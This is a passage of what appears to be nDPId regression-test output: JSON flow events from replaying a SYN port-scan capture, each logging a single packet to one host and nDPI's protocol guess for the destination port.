{"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 